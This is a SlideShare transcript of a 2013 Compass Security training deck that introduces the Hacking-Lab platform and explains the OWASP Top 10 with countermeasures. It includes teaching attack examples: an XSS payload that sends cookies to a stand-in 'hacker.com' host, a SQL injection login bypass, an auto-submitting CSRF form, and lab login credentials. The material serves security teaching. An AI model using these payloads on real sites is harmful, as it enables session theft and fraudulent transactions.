• Like

Thanks for flagging this SlideShare!

Oops! An error has occurred.

Published

Labs bei der Digicomp, Penetration Testing und Web Hacking Challenges von Ivan Bütler

Labs bei der Digicomp, Penetration Testing und Web Hacking Challenges von Ivan Bütler

Published in Technology , News & Politics
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
1,958
On SlideShare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
26
Comments
0
Likes
2

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Ethical HackingTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 JonaDigicomp Hacking Day 2013by Ivan Bütler, CEO Compass Security AG, Alias E1ivan.buetler@csnc.ch
  • 2. Wir sind „Hacker“© Compass Security AG Slide 2www.csnc.ch
  • 3. Rapperswil – Berlin - Bern© Compass Security AG Slide 3www.csnc.ch
  • 4. Was machen wir so den ganzen Tag?© Compass Security AG Slide 4www.csnc.ch
  • 5. Warum sind Sie heute hier?Was bringt die Zukunft?Sie sind ein Nerd?Illegale Sachen sind reizvoll?Sie wollen geistig gefordertwerden?© Compass Security AG Slide 5www.csnc.chSie wollen die Welt ein Stückbesser machen?Sie planen eine Karriere bei derCyber Mafia?Sie planen eine Karriere als SwissCyber Spezialist?Wegen dem guten Essen?
  • 6. Übersicht „Security Testing“Treiber fürFirma Lieferant© Compass Security AG Slide 6www.csnc.chCompliance Budget Sign-OffTreiber fürSecurity TestsAwarenessInformation Security ManagementErgebnisse / Gefahren
  • 7. Übersicht „Security Testing“• manuell vs. automatisiert• einmalig vs. regelmässig• Blackbox vs. Whitebox• mit und ohne LoginMethoden© Compass Security AG Slide 7www.csnc.ch• mit und ohne Login• Hands-On vs. Review• mit oder ohne Social Eng.• mit oder ohne Source Code• von aussen oder innen?
  • 8. Übersicht „Security Testing“Simulation von Angreifern – Intensität des Penetration Tests© Compass Security AG Slide 8www.csnc.ch
  • 9. Was braucht ein guter Tester?Tel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 10. Was ist ein guter Security Tester?TüftlerWie funktioniert etwas?Warum funktioniert es?Auseinandernehmen© Compass Security AG Slide 10www.csnc.chAuseinandernehmenZusammenbauenTöffli Frisierer!
  • 11. ES BRAUCHT PRAXIS und ZEITTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 12. Hacking-Lab Online Security Lab© Compass Security AG Slide 12www.csnc.ch
  • 13. Hacking-Lab Architecture© Compass Security AG Slide 13www.csnc.ch
  • 14. Working with Hacking-LabChallenge Details© Compass Security AG Slide 14www.csnc.chHands-OnSend SolutionSolution Grading
  • 15. Hacking-Lab RolesStudent 1. Choose the challenge(s)2. Solve the challenge3. Answer the questions (submit)4. Wait© Compass Security AG Slide 15www.csnc.chTeacher 1. Responsible for challenges2. Receiving your submissions3. Solution Gradinga) FULLY ACCEPTb) PARTIALL ACCEPTc) REJECT
  • 16. Hacking-Lab Challenges & CategoriesWeb SecurityMalware / Trojan / BugsWindows SecurityApple SecurityVoiP / SS7 / GSMWireless SecurityUnix / Linux SecurityCrypto Challenges© Compass Security AG Slide 16www.csnc.chApple SecurityPenetration TestingNetworkingForensicsReverse EngineeringCrypto ChallengesProgrammingFun Challenge
  • 17. Challenges – SBS versus WGEvery challenge in Hacking-Lab is available as SBS orWGSBSStep by StepSBS challengesare used incommercialWGWargameWG challengesare used in freetrainings, CTF© Compass Security AG Slide 17www.csnc.chcommercialtrainings.Trainees do nothave the time tospend 1-2 hoursper challenge.They will beguided throughthe challenge.trainings, CTFand talent quest.Solving a WGchallenge is moredifficult andneeds moreknowledge.
  • 18. Challenges - SBS versus WGWG ChallengesWG = WargameThe mission of the challenge is given, but without further detailsFor the more advanced usersLevel 1 = 10 pointsLevel 1 = 10 pointsLevel 1 = 10 pointsLevel 1 = 10 pointsLevel 2 = 20 pointsLevel 2 = 20 pointsLevel 2 = 20 pointsLevel 2 = 20 pointsLevel 3 = 30 pointsLevel 3 = 30 pointsLevel 3 = 30 pointsLevel 3 = 30 points© Compass Security AG Slide 18www.csnc.chSBS ChallengesSBS = Step by StepThe mission of the challenge is given, including a step by step instructionFor the beginnersLevel 1 = 5 pointsLevel 1 = 5 pointsLevel 1 = 5 pointsLevel 1 = 5 points (50% of WG)Level 2 = 10 pointsLevel 2 = 10 pointsLevel 2 = 10 pointsLevel 2 = 10 points (50% of WG)Level 3 = 15 pointsLevel 3 = 15 pointsLevel 3 = 15 pointsLevel 3 = 15 points (50% of WG)
  • 19. Examples (Screenshots)Tel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 20. Running Events (Classrooms)© Compass Security AG Slide 20www.csnc.ch
  • 21. © Compass Security AG Slide 21www.csnc.ch
  • 22. © Compass Security AG Slide 22www.csnc.ch
  • 23. © Compass Security AG Slide 23www.csnc.ch
  • 24. © Compass Security AG Slide 24www.csnc.ch
  • 25. © Compass Security AG Slide 25www.csnc.ch
  • 26. © Compass Security AG Slide 26www.csnc.ch
  • 27. © Compass Security AG Slide 27www.csnc.ch
  • 28. Ranking Page© Compass Security AG Slide 28www.csnc.ch
  • 29. Avatar System© Compass Security AG Slide 29www.csnc.ch
  • 30. Working from Remote?Using the HL LiveCDTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 JonaVPN is requiredUsing the HL LiveCD
  • 31. LiveCD Project (OpenVPN)ESX for LiveCD DevLiveCD Vx.y© Compass Security AG Slide 31www.csnc.chLiveCD Vx.z LiveCD Vx.zVirtualBox OVALiveCD Vx.zVmware OVALiveCD SVNRepository
  • 32. Hacking-Lab LiveCD Project© Compass Security AG Slide 32www.csnc.ch
  • 33. Hacking-Lab LiveCD Project© Compass Security AG Slide 33www.csnc.chBrowser1) Two profiles2) Attacker3) Victim4) SwitchProxy5) LiveHttpHeader6) ... more
  • 34. Hacking-Lab LiveCD ProjectZAPInspection© Compass Security AG Slide 34www.csnc.chInspectionProxy1) Web Analysis2) Man in the Middle3) Open Source4) Java based5) Loading = slow
  • 35. Hacking-Lab LiveCD Project© Compass Security AG Slide 35www.csnc.chHELP1) Local webserver2) Help
  • 36. How to Access Microsoft VM (VDI)© Compass Security AG Slide 36www.csnc.chROOTShell
  • 37. How to Access Microsoft VM (VDI)© Compass Security AG Slide 37www.csnc.chUserShell
  • 38. Hacking-Lab LiveCD Project© Compass Security AG Slide 38www.csnc.chVPN
  • 39. How to Access Microsoft VM (VDI)© Compass Security AG Slide 39www.csnc.chVmwareViewVDI
  • 40. How to Access Microsoft VM (VDI)© Compass Security AG Slide 40www.csnc.ch
  • 41. How to Access Microsoft VM (VDI)User: hacker10, hacker11, hacker12 with password compass© Compass Security AG Slide 41www.csnc.ch
  • 42. How to Access Microsoft VM (VDI)Choose VIEW pool (Hacking-Lab Clients)© Compass Security AG Slide 42www.csnc.ch
  • 43. 5) How to Access Microsoft VM (VDI)Enjoy the XP machine (connected with PCoIP)© Compass Security AG Slide 43www.csnc.ch
  • 44. https://www.hacking-lab.com/tutorial/LiveCD usage with VirtualBox ApplianceLiveCD usage with Vmware8 workstation© Compass Security AG Slide 44www.csnc.chHow to connect in HL with OpenVPNhttps://www.hacking-lab.com/FAQ/
  • 45. © Compass Security AG Slide 45www.csnc.chOnline Qualification im April / Mai 2013Halb-Final 13. Juni 2013, KKL LuzernFinal in Linz / Wien, 5-7. November 2013
  • 46. Wie funktioniert der Cyber Challenge?© Compass Security AG Slide 46www.csnc.ch
  • 47. © Compass Security AG Slide 47www.csnc.ch
  • 48. Machen Sie mit!!Swiss Cyber Storm Registrierunghttps://www.hackinghttps://www.hackinghttps://www.hackinghttps://www.hacking----lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7Digicomp Hacking Day 2013 Web Securityhttp://bit.ly/10YcIMmhttp://bit.ly/10YcIMmhttp://bit.ly/10YcIMmhttp://bit.ly/10YcIMm© Compass Security AG Slide 48www.csnc.chDigicomp Hacking Day 2013 Penetration Testinghttp://bit.ly/18LK7lghttp://bit.ly/18LK7lghttp://bit.ly/18LK7lghttp://bit.ly/18LK7lg
  • 49. Attack VectorsTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 50. What are the Hackers doing?Direct AttacksBLOCKED© Compass Security AG Slide 50www.csnc.chPASSEDBLOCKED
  • 51. Man in the Middle – e.g. PhishingIndirect Attacks© Compass Security AG Slide 51www.csnc.ch
  • 52. Malware – Mobile Devices – W-LANIndirect Attacks© Compass Security AG Slide 52www.csnc.chPASSED
  • 53. Covert ChannelIndirect AttacksDelivery via USB-Stick© Compass Security AG Slide 53www.csnc.chInternetCompany NetworkStart viaAuto-StartAttacker „observes“the victim computer
  • 54. Network Penetration TestingTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 55. Anatomy of a Hacker AttackFootprinting ScanningThinkTimeWriting Break-inInstallationDoS© Compass Security AG Slide 55www.csnc.chSource: Anti-Hacker BookWritingExploitsBreak-inPrivilegeEscalationSteelingDataDeleteevidenttracksBackdoors
  • 56. Penetration TestingInformation GatheringNetwork ResearchWar GooglingScanningHost and Service DiscoveryVulnerability Scanning© Compass Security AG Slide 56www.csnc.chExploitationSniffing the NetworkExploiting Vulnerabilities (VLAN, VoIP, Conficker, DNS Updates)Backdoor CommunicationInside-OutCovert-Channels
  • 57. Web Application SecurityOWASP Top 10Tel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 JonaOWASP Top 10Digicomp Hacking Day 2013
  • 58. OWASP TOP 10© Compass Security AG Slide 58www.csnc.ch
  • 59. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 59www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 60. SQL InjectionTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 61. A1: SQL InjectionInjection flaws occur when anapplication sendsuntrusteddata to aninterpreter. Injection flawsare very prevalent, oftenfound in SQL queries,LDAP queries,© Compass Security AG Slide 61www.csnc.chLDAP queries,XPathqueries, OScommands, programarguments, etc. Injectionflaws are easy to discoverwhen examining code, butmore difficult via testing.
  • 62. IntroductionProtocols© Compass Security AG Slide 62www.csnc.chHTTPSRMISQL
  • 63. SQL InjectionUser input is directly used to buildSQL statementsApplication MaliciousHackerinjects SQL String© Compass Security AG Slide 63www.csnc.chModification of SQL query via browserApplicationQueryselect creditcard fromCustomers where user is ‘ibuetler’MaliciousQueryOR 1=1;
  • 64. SQL InjectionProtocols© Compass Security AG Slide 64www.csnc.chRMIHTTPS + SQL Hacker CodeSQL
  • 65. Threat: Bypass AuthenticationAssembling Strings to SQL Queriespublic boolean auth(String user, String pass) {boolean isAuthenticated = false;string sqlQueryString = "SELECT Username " +"FROM Users WHERE Username = " + user +dynamic concatenationof SQL string andparameters© Compass Security AG Slide 65www.csnc.ch" AND Password = " + pass + "";int resultCount = perform(sqlQueryString)if (resultCount > 0) {return true;}return false;}Checks if at least onerecord exists. Butthe result mustcontain 0 or oneresult
  • 66. Threat: Bypass AuthenticationAttacker uses following input:Login: meierPassword: OR =SELECT Username FROM UsersWHERE Username=meier AND Password= OR=© Compass Security AG Slide 66www.csnc.ch=WHERE clause evaluates to TRUEAll rows of table get selectResult Set will not be empty!!!User gets authenticated!
  • 67. CountermeasuresA1: SQL InjectionTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 JonaA1: SQL Injection
  • 68. Secure ProgrammingSecure ProgrammingJavaUse Prepared StatementsADO.NETUse Parameters CollectionDB-Level© Compass Security AG Slide 68www.csnc.chDB-LevelStored Procedures (do not use dynamic SQL in SP!)
  • 69. Secure Programming (I) - JavaJava Prepared StatementsSQL statement gets precompiled at databaseParameters are separate from the SQL statementMuch faster when SQL statement is used several timesSave against SQL injection attacks© Compass Security AG Slide 69www.csnc.chPreparedStatement updateSales =dbCon.prepareStatement("UPDATE COFFEES SET"+ "SALES=? WHERE COF_NAME LIKE ?");updateSales.setInt(1, 75); // correctupdateSales.setString(2, "Colombian"); // usageupdateSales.executeUpdate():
  • 70. Insecure - Secure Programming (III)But be aware. This Prepared Statement is still vulnerable toSQL injection!//Prepares the statement on the databasePreparedStatement updateSales =dbCon.prepareStatement(© Compass Security AG Slide 70www.csnc.ch"UPDATE COFFEES SET SALES=? WHERE COF_NAME "+ "LIKE " + name + ""); // insecure usage//Sets the parameters for the statementupdateSales.setString(1, req.getParameter("sale"));//Executes the statementupdateSales.executeUpdate():
  • 71. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 71www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 72. A2: Cross Site ScriptingXSS is the most prevalentweb application securityflaw. XSS flaws occurwhen an applicationincludes user supplieddataina page sent to thebrowser without properly© Compass Security AG Slide 72www.csnc.chbrowser without properlyvalidating or escapingthatcontent.
  • 73. Attack VectorProtocolJavaScript from www.abc.com isloaded to the client (Malware)© Compass Security AG Slide 73www.csnc.chAttrackting!!Authentication into Web ApplicationSession Hijacking (re-use client session)
  • 74. Java Script from Malware Site (1)E-BankMalware SiteCookie betweenE-Bank and Browser© Compass Security AG Slide 74www.csnc.chJava Script from Malware SiteIS GENERALLY DENIEDIS GENERALLY DENIEDIS GENERALLY DENIEDIS GENERALLY DENIED toaccess the E-Bank cookiebecause of the SAME ORIGINPOLICY
  • 75. Java Script from Malware Site (2)E-BankMalware SiteCookie betweenE-Bank and Browser<script src=http://Malware Site/m.js>© Compass Security AG Slide 75www.csnc.chJava Script from Malware SiteIS ALLOWEDIS ALLOWEDIS ALLOWEDIS ALLOWED to access the E-Bank cookie, if the Script isloaded from the E-Bank site(Origin) with <script src=>
  • 76. Cross-Site Scripting (XSS)Tel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 77. Session Stealing SequenceMalicious JavaScript performs its own requestHacker ClientWebApplicationPOST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>Stores value© Compass Security AG Slide 77www.csnc.chGET /app/document.jsp?id=898Cookie: session=123Response:<script>location.href="http://hacker.com/"+document.cookie</script>GET /session=123Stores valuein DBStores Requestin Log File
  • 78. Reflected XSSWhat is reflected XSS?data provided by a web client is used immediately by server-sidecode to generate a page of results for that user.Attacker has to send a crafted link to the victim.Typical example: search form© Compass Security AG Slide 78www.csnc.chAttacker Victim Webserversends link:http://example.com/search?<script>...</script> GET /search?<script>...</script>search results for:<script>...</script>Script isexecuted
  • 79. Stored XSSWhat is stored XSS?data provided by a web client is stored in a database. This data isthen presented to the user unencoded.Malicious script is rendered more than once.XSS worms are based on stored XSS vulnerabilities.Typical example: message board© Compass Security AG Slide 79www.csnc.ch
  • 80. RecommendationsTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 81. XSS PreventionPossible solutionsConvert output into HTML entities< &lt;> &gt;" &quot; &apos;Input validation on characters© Compass Security AG Slide 81www.csnc.chInput validation on charactersDo not accept "dangerous" characters (e.g. <)Delete "dangerous" characters from requestTransform "dangerous" characters into HTML entitiesInput validation on strings / tagsDo not accept "dangerous" tags (e.g. <script>)Delete "dangerous" tags from requestTransform "dangerous" tags into HTML entities
  • 82. ESAPIOWASP Enterprise Security API (ESAPI)Available for all major programming languagesJava.NET (work in progress)PHP (work in progress)Coldfusion (work in progress)© Compass Security AG Slide 82www.csnc.chColdfusion (work in progress)...Methods to prevent XSSEncoder.encodeForHTML(maliciousString);Encoder.encodeForHTMLAttribute(maliciousString);Encoder.encodeForJavascript(maliciousString);Encoder.encodeForVBScript(maliciousString);
  • 83. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 83www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 84. A3: Broken AuthenticationDevelopers frequently buildcustom authentication andsession schemes, butbuilding these correctly ishard. As a result, theyfrequently have flaws,usually in areas such as© Compass Security AG Slide 84www.csnc.chusually in areas such aslogout, passwordmanagement, timeouts,remember me, secretquestion, account update,etc. Finding such flaws cansometimes be difficult, aseach implementation isunique.
  • 85. HTTP Authentication Mechanisms© Compass Security AG Slide 85www.csnc.ch
  • 86. Strong Authentication SMS© Compass Security AG Slide 86www.csnc.ch1) UN/PW2) OTP
  • 87. Client Certificate Auth© Compass Security AG Slide 87www.csnc.ch
  • 88. Authentication StrengthFactors of Authentication (3 variants)To KNOWKNOWKNOWKNOW somethingPassword, PINTo OWNOWNOWNOWN somethingSmartcard, SecurId, Safeword, Vasco, OTPTo BEBEBEBE something© Compass Security AG Slide 88www.csnc.chTo BEBEBEBE somethingFingerprint, Iris, Voice, FaceDefinition of “Strong authentication”Combination of at least 2 factors
  • 89. Authentication in Web ApplicationsBrowser AuthenticationBased on Response Headers (HTTP ProtocolHTTP ProtocolHTTP ProtocolHTTP Protocol)BasicAuthDigestAuthNTML AuthForm-based Authentication (Application LoginApplication LoginApplication LoginApplication Login)POST: Submit Login Credentials in Post Body© Compass Security AG Slide 89www.csnc.chPOST: Submit Login Credentials in Post BodyGET: Submit Login Credentials in URLSSL based Authentication (HTTPS ProtocolHTTPS ProtocolHTTPS ProtocolHTTPS Protocol)Client CertificateAuthentication SchemesDirectChallenge/ResponseSecond Channel (SMS, Tokens)
  • 90. Login Service AttacksTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 91. User EnumerationVerbose login related error messages can lead to user enumeration“Password incorrect”“User unknown”Login error messages must be neutral“Username or Password incorrect”© Compass Security AG Slide 91www.csnc.ch“Username or Password incorrect”Critical dialogsLoginChange passwordLost password
  • 92. Session Handling AttacksTel +41 55 214 41 60Fax +41 55 214 41 61team@csnc.chwww.csnc.chCompass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
  • 93. Session FixationSpecial form ofsession hijackingHacker tricks thevictim to use aVictim Hacker WebApp/index.htmlSession=123;Please use session=123 for Webapp/index.html; Session=123© Compass Security AG Slide 93www.csnc.chvictim to use asession knownto the hackerIn exampleURL basedsession trackingis usedLoginFormdoLogin(UserCredentials) + session=123;Authenticate();Auth=Successfull!/protected/index.html + session=123;/protected/index.html + session=123;
  • 94. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 94www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 95. A4: Insecure Direct Object References1. For direct references torestricted resources, theapplication needs toverify the user isauthorized to access theexact resource they haverequested.© Compass Security AG Slide 95www.csnc.chrequested.2. If the reference is anindirect reference, themapping to the directreference
  • 96. Security by ObscurityInsecure Admin LinksMenu links as the only means of authorizationBypass with URL and parameter guessing possibleOnly partially implemented authorization© Compass Security AG Slide 96www.csnc.chOnly partially implemented authorizationFunction authorization only
  • 97. Authorization “decentralized”Single functions must call authorization checksFunctionor DataRequestRequest© Compass Security AG Slide 97www.csnc.chThreatsCall to the authorization module are easily forgottenEach function must be testedFunctionor Dataor DataAuthorizationCheck
  • 98. Authorization “centralized”Authorization must be implementedAs centrally as possibleAs one moduleAdvantagesLess risk that implementationof authorization checks areAuthorization CheckRequestRequest© Compass Security AG Slide 98www.csnc.chof authorization checks areforgottenEasier to testDisadvantagesData authorization often difficult to achieveFunctionor DataFunctionor Data
  • 99. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 99www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 100. A5: Cross Site Request ForgeryThe easiest way to checkwhether an application isvulnerable is to see if eachlink and form contains anunpredictable token foreach user. Without such anunpredictable token,© Compass Security AG Slide 100www.csnc.chunpredictable token,attackers can forgemalicious requests. Focuson the links and forms thatinvoke state-changingfunctions, since those arethe most important CSRFtargets.
  • 101. IntroductionCross Site Request Forgery has many namesXSRFSession RidingOne Click AttackXSRF != XSSXSS exploits the trust that a client has for the© Compass Security AG Slide 101www.csnc.chXSS exploits the trust that a client has for thewebsite/applicationClient trusts the website:All the javascript code is necessary to run the webapplicationXSRF exploits the trust that a website has for the user.Website trusts the client:All requests made by the user are intended to be made
  • 102. Cross Site Request ForgeryE-BankMalware SiteCookie betweenE-Bank and Browser© Compass Security AG Slide 102www.csnc.chJava Script from Malware SiteIS NOT ALLOWEDIS NOT ALLOWEDIS NOT ALLOWEDIS NOT ALLOWED to accessthe E-Bank cookie
  • 103. Cross Site Request ForgeryE-BankMalware SiteCookie betweenE-Bank and Browser<img src=http://bank/do_trade>© Compass Security AG Slide 103www.csnc.ch<img src=> loads image frombank = this is allowed andperforms the malicoustransaction
  • 104. XSRF with GET MethodActions can be made by calling GET Requests (e.g. Order someitems)http://www.shop.com/controller?action=buy&productId=1&quantity=23© Compass Security AG Slide 104www.csnc.ch
  • 105. XSRF with POST MethodActions can be made by calling POST Requests (e.g. Order some items)© Compass Security AG Slide 105www.csnc.chPOST /controllerHost: www.shop.com.....action=buy&productId=1&quantity=23
  • 106. Malicious Hacker „POST“ FormPrepared Website from Hacker<body><form action="http://www.shop.com/controller"method="POST"><input type="hidden" name="action" value="buy"/><input type="hidden" name="productId" value="1"/>© Compass Security AG Slide 106www.csnc.ch<input type="hidden" name="productId" value="1"/><input type="hidden" name="quantity" value="23"/></form><script>document.forms[0].submit();</script></body>
  • 107. AssumptionsThe attacker knows the target websiteHow do the requests look like?The victim has a valid session cookieIf session handling is done in the URL, the website is notvulnerable to this kind of attack.© Compass Security AG Slide 107www.csnc.ch
  • 108. RemediationForm contains hidden field with random token.Executing the request will send the hidden-field-token to theserver.Server now checks if the hidden-field-token is valid, if not: therequest is cancelled© Compass Security AG Slide 108www.csnc.chOnly allowing POST Requests is no solutionHidden formJavascript: form.submit()In other words:Websites should embed fresh nonce in every form, check for iton every requestForged requests will have cookie, but not the nonce
  • 109. Order after RemediationVictim WebshopLoginCookie = 123GET /order_form.htm© Compass Security AG Slide 109www.csnc.chGET /controller?action=buy&token=uiwe4qi4&...Cookie=123Order successful_Cookie=123order_form.htm<input type=“hidden“ name=“token“ value=“uiwe4qi4“>Generate randomtoken and embedin form as hiddenfieldCheck token
  • 110. Order after Remediation© Compass Security AG Slide 110www.csnc.ch
  • 111. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 111www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 112. A6: Security MisconfigurationSecurity misconfiguration canhappen at any level of anapplication stack, includingthe platform, web server,application server,framework, and customcode. Developers and© Compass Security AG Slide 112www.csnc.chcode. Developers andnetwork administratorsneed to work together toensure that the entire stackis configured properly.Automated scanners areuseful for detecting missingpatches, misconfigurations,use of default accounts,unnecessary services, etc.
  • 113. Examples of MisconfigurationsDo you have a process for keeping current on the latestversions and patches to all the software in your environment?This includes the OS, Web/App Server, DBMS, applications, andany libraries.Is everything unnecessary disabled, removed, or not installed(e.g., ports, services, pages, accounts)?© Compass Security AG Slide 113www.csnc.ch(e.g., ports, services, pages, accounts)?Are default account passwords changed or disabled?Are all other security settings configured properly.Are all servers protected by Firewalls / Filters … etc. Aconcerted, repeatable process is required to develop andmaintain a proper security configuration.
  • 114. Examples of MisconfigurationsExamples of Glocken-Shop MisconfigurationsXML Injection -> /etc/passwd & /etc/shadowDirectory Browsing of glocken.hacking-lab.com/logs/Tomcat Service runs with „root“ privileges© Compass Security AG Slide 114www.csnc.chTomcat Service runs with „root“ privileges
  • 115. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 115www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects andForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 116. A7: Failure to restrict URL AccessApplications are not alwaysprotecting page requestsproperly. Sometimes, URLprotection is managed viaconfiguration, and thesystem is misconfigured.Sometimes, developers© Compass Security AG Slide 116www.csnc.chSometimes, developersmust include the propercode checks, and theyforget.Detecting such flaws is easy.The hardest part isidentifying which pages(URLs) exist to attack.
  • 117. IntroductionFailure to restrict URL accessPrivilege Escalation from anonymous to registered userPrivilege Escalation from registered to admin userExamples of URL‘s© Compass Security AG Slide 117www.csnc.chExamples of URL‘shttp://example.com/app/getappInfohttp://example.com/app/admin_getappInfoExploitIf an authenticated, non-admin, user is allowed to access the“admin_getappInfo”page, this is a flaw, and may lead the attacker tomore improperly protected admin pages.
  • 118. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 118www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 119. Unvalidated Redirects and ForwardsSuch redirects may attemptto install malware or trickvictims into disclosingpasswords or othersensitive information.Unsafe forwards mayallow access control© Compass Security AG Slide 119www.csnc.challow access controlbypass.
  • 120. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 120www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 121. Insecure Cryptographic StorageThe most common flaw inthis area is simply notencrypting data thatdeserves encryption.When encryption isemployed, unsafe keygeneration and storage,© Compass Security AG Slide 121www.csnc.chgeneration and storage,not rotating keys, andweak algorithm usage iscommon. Use of weakand unsalted hashes toprotect passwords isalso common. Externalattackers have difficultydetecting such flaws dueto limited access.
  • 122. Hashed and Salted User PasswordsDo not store passwords in plain-text to the table!!Example: table with user accounts & plaintext password pose ahigh security risk!mysql> select username, password from users;+----------+----------+© Compass Security AG Slide 122www.csnc.ch+----------+----------+| username | password |+----------+----------+| hacker10 | compass || hacker11 | compass |...If possible: One-way-hashed and salted passwords using hashalgorithms like SHA-1 (Do not use MD5 anymore)
  • 123. OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request Forgery© Compass Security AG Slide 123www.csnc.chA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport LayerProtection
  • 124. Insufficient Transport Layer ProtectionApplications frequently do notproperly protect networktraffic. Usually, they useSSL/TLS duringauthentication, but notelsewhere, exposing alltransmitted data as well as© Compass Security AG Slide 124www.csnc.chtransmitted data as well assession IDs to interception.Applications sometimes useexpired or improperlyconfigured certificates as well.Detecting such flaws is easy. Justobserve the site’s networktraffic.
  • 125. MitigationUse SSL + TLSSet-Cookie: A=B; secure; HttpOnlyReverse ProxyEntry Server© Compass Security AG Slide 125www.csnc.chReverse ProxySecure Gateway